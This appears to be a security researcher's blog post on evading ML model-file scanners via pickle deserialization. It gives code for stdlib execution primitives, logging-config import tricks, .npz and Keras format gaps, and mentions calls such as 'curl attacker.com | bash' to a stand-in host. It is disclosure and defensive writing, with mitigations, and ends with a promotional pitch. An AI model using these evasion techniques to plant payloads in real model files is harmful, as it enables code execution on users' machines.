DEV Community

manja316

I Found 29 Ways to Bypass ML Model Security Scanners — Here's What's Actually Broken


When you download a pre-trained model from Hugging Face, PyTorch Hub, or any model registry, a security scanner is supposed to catch malicious payloads before they execute on your machine. I spent a week trying to bypass the most widely used scanner and found 29 distinct techniques that pass undetected.

This isn't theoretical. Every bypass has a working proof-of-concept uploaded to Hugging Face.

The Problem: Model Files Execute Code on Load

Most developers don't realize that loading a .pkl, .pt, or .h5 file can execute arbitrary code. Python's pickle module calls __reduce__ during deserialization — meaning a model file can run os.system("curl attacker.com | bash") the moment you call torch.load().
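The mechanism is easy to demonstrate with a benign payload. This sketch uses `os.getcwd` in place of a shell command, but the unpickler will call whatever callable `__reduce__` hands it:

```python
import os
import pickle

class Payload:
    # __reduce__ tells pickle how to rebuild the object:
    # return (callable, args), and the unpickler calls callable(*args).
    def __reduce__(self):
        return (os.getcwd, ())  # benign stand-in for os.system(...)

blob = pickle.dumps(Payload())
result = pickle.loads(blob)  # os.getcwd() runs during deserialization
print(result)
```

Swap `os.getcwd` for `os.system` and an argument string, and you have the classic malicious-model payload.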

Security scanners like modelscan are supposed to catch this by inspecting the pickle bytecode for dangerous imports (os, subprocess, builtins). This blocklist approach has a fundamental flaw: Python has hundreds of ways to execute code, and an attacker only needs to find ONE that the scanner misses.

The Bypass Categories

After systematic testing, the bypasses fall into five categories:

1. Standard Library Code Execution (12 bypasses)

Python's standard library is full of modules that execute shell commands internally. The scanner blocks os.system and subprocess.Popen, but misses:

```python
# cProfile.run — executes arbitrary Python via exec()
import cProfile
cProfile.run("__import__('os').system('id')")

# profile.run — same as cProfile but a different module
import profile
profile.run("__import__('os').system('id')")

# pydoc.pipepager — calls subprocess.Popen(shell=True)
import pydoc
pydoc.pipepager("", cmd="id")
```

Each of these is a single function call that the scanner doesn't flag because cProfile, profile, and pydoc aren't on the blocklist.

2. Configuration-Based Execution (5 bypasses)

Python's logging.config.dictConfig contains an internal function called resolve() that acts as an arbitrary import oracle. It takes a dotted string like "subprocess.Popen" and returns the actual callable.

```python
import logging.config

logging.config.dictConfig({
    'version': 1,
    'handlers': {
        'rce': {
            '()': 'subprocess.Popen',
            'args': ['id'],
        }
    }
})
```

The scanner sees logging.config.dictConfig — a logging setup function. It doesn't understand that resolve() internally does getattr(__import__('subprocess'), 'Popen').
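In effect, resolve() is a dotted-path importer. A simplified sketch of that behavior (not the actual stdlib code, which also handles submodule imports):

```python
def resolve(dotted):
    # Walk a dotted path like "subprocess.Popen" from the root module
    # down to the final attribute, simplified from logging.config's
    # internal resolver.
    parts = dotted.split('.')
    obj = __import__(parts[0])
    for part in parts[1:]:
        obj = getattr(obj, part)
    return obj

popen = resolve('subprocess.Popen')
print(popen)
```

Any config key that ends up routed through this resolver is an arbitrary-import primitive, even though the outer function looks like harmless logging setup.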

3. Format-Level Bypasses (3 bypasses)

Some file formats are simply not scanned at all:

  • .npz files: NumPy's compressed archive format. The scanner returns "not implemented" and passes the file through, so any payload inside a .npz file is invisible.
  • Joblib format: joblib serializes through a different code path than plain pickle, and the scanner handles it differently, leaving gaps in coverage.
  • Keras Lambda layers: when a Lambda layer is nested inside a wrapper layer such as TimeDistributed, the inner Lambda's code isn't inspected.

The .npz bypass is the most concerning because it's a scanner skip — not a detection miss, but a complete gap in coverage. The scanner explicitly says it can't handle the format and moves on.
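The gap is easy to reproduce, because NumPy stores object arrays inside a .npz archive by pickling them, so a `__reduce__` payload rides along. A benign sketch (`os.getcwd` in place of a shell command); note the payload only fires when the consumer loads with `allow_pickle=True`:

```python
import io
import os
import numpy as np

class Payload:
    def __reduce__(self):
        return (os.getcwd, ())  # benign stand-in

# Object arrays are serialized with pickle inside the .npz archive
arr = np.array([Payload()], dtype=object)
buf = io.BytesIO()
np.savez(buf, weights=arr)
buf.seek(0)

# allow_pickle=True unpickles the embedded payload on load
loaded = np.load(buf, allow_pickle=True)
print(loaded["weights"][0])
```

A scanner that skips the format entirely never sees that embedded pickle at all.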

4. Network-Based Payloads (4 bypasses)

Instead of executing commands locally, these establish outbound connections:

```python
# ftplib.FTP — opens a TCP connection in __init__
import ftplib
ftplib.FTP("attacker.com")  # connects immediately

# uuid._get_command_stdout — private helper that shells out
# via subprocess.Popen and returns the command's stdout
import uuid
uuid._get_command_stdout("id")
```

These are useful for data exfiltration scenarios where the attacker wants to phone home without running obvious shell commands.

5. Indirect Execution Chains (5 bypasses)

These combine multiple "safe" operations into a code execution chain:

```python
# importlib + getattr chain — each step looks benign in isolation
import importlib

mod = importlib.import_module('os')
getattr(mod, 'system')('id')
```

Each individual operation looks benign. The scanner would need to understand the full execution chain to detect the threat.

What This Means for Your ML Pipeline

If you're running pre-trained models from external sources:

  1. Don't trust scanner output as gospel. A "clean" scan doesn't mean the model is safe.
  2. Sandbox model loading. Use containers or VMs to isolate the deserialization step.
  3. Prefer safe formats. SafeTensors stores only tensor data — no code execution possible.
  4. Monitor outbound connections. Even if code executes, catch the exfiltration.

How I Automated the Discovery

Finding these manually would take months. I built a systematic approach:

  1. Enumerate standard library callables — script that crawls every module in Python's stdlib looking for functions that eventually call exec(), eval(), or subprocess
  2. Generate PoC pickle payloads — template that wraps any callable into a valid pickle __reduce__ tuple
  3. Scan and verify — run modelscan against each payload, verify which ones pass undetected
  4. Upload to HF — create repos with proper model cards documenting the bypass

The enumeration step is where a security scanning skill really shines — it systematically maps attack surfaces rather than guessing at individual payloads. I built mine to crawl import chains and identify any path from a "safe" module to dangerous operations like Popen or exec.
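A minimal version of that enumeration step, assuming a simple text-level heuristic over function source (the real crawler follows import chains rather than grepping, so treat this as a sketch):

```python
import importlib
import inspect

# Hypothetical heuristic: flag module-level functions whose source
# references exec/eval or subprocess machinery.
MARKERS = ("exec(", "eval(", "subprocess.", "Popen(")

def risky_callables(module_name):
    try:
        mod = importlib.import_module(module_name)
    except ImportError:
        return []
    hits = []
    for name, fn in inspect.getmembers(mod, inspect.isfunction):
        try:
            src = inspect.getsource(fn)
        except (OSError, TypeError):
            continue  # C functions and builtins have no Python source
        if any(marker in src for marker in MARKERS):
            hits.append(f"{module_name}.{name}")
    return hits

print(risky_callables("subprocess"))
```

Run this across every stdlib module and you get a candidate list of single-call execution primitives to wrap into pickle payloads.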

The Deeper Issue

Blocklist-based scanning is fundamentally broken for Python. The language is too dynamic — getattr, __import__, resolve(), and dozens of other mechanisms make it impossible to enumerate every dangerous path.

The fix isn't a better blocklist. It's either:

  • Format-level safety (SafeTensors, ONNX) — eliminate code execution entirely
  • Runtime sandboxing — let code execute but contain the blast radius
  • Allowlist scanning — instead of blocking known-bad, only allow known-good
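For pickle specifically, allowlisting is straightforward to sketch: override `Unpickler.find_class` so that only explicitly approved globals resolve, and everything else fails closed. A minimal sketch:

```python
import collections
import io
import pickle

# Only these (module, name) pairs may be resolved during unpickling
SAFE_GLOBALS = {("collections", "OrderedDict")}

class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

def safe_loads(blob):
    return AllowlistUnpickler(io.BytesIO(blob)).load()

# Known-good data round-trips
ok = safe_loads(pickle.dumps(collections.OrderedDict(a=1)))

# A __reduce__ payload fails closed instead of executing
class Payload:
    def __reduce__(self):
        import os
        return (os.getcwd, ())

try:
    safe_loads(pickle.dumps(Payload()))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

None of the 29 bypasses above gets past this, because the question flips from "is this import known-bad?" to "is this import known-good?"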

Until then, every model you download from the internet is a potential RCE vector. The scanners give you a false sense of security.

Building Your Own Detection

If you want to build scanning into your own pipeline, here's the architecture I use:

  1. Pre-scan: Static analysis of pickle opcodes (catches the obvious stuff)
  2. Import chain analysis: Map every callable in the payload to its full execution chain
  3. Sandbox execution: Load the model in a throwaway container, monitor syscalls
  4. Network monitoring: Flag any outbound connections during model load

The API connector skill helps wire this into your existing CI/CD — you can trigger scans on every model artifact push and pipe results into your monitoring dashboard.

Responsible Disclosure

All 29 bypasses have been reported through proper channels. The PoC repos on Hugging Face are for verification purposes — they execute benign commands (id, echo) rather than anything destructive. The goal is to improve scanner coverage, not enable attacks.


Building security tools for ML pipelines? The AI Security Scanner Skill automates vulnerability discovery across model files, API endpoints, and deployment configs. It's the same methodology that found these 29 bypasses, packaged as a reusable Claude Code skill.
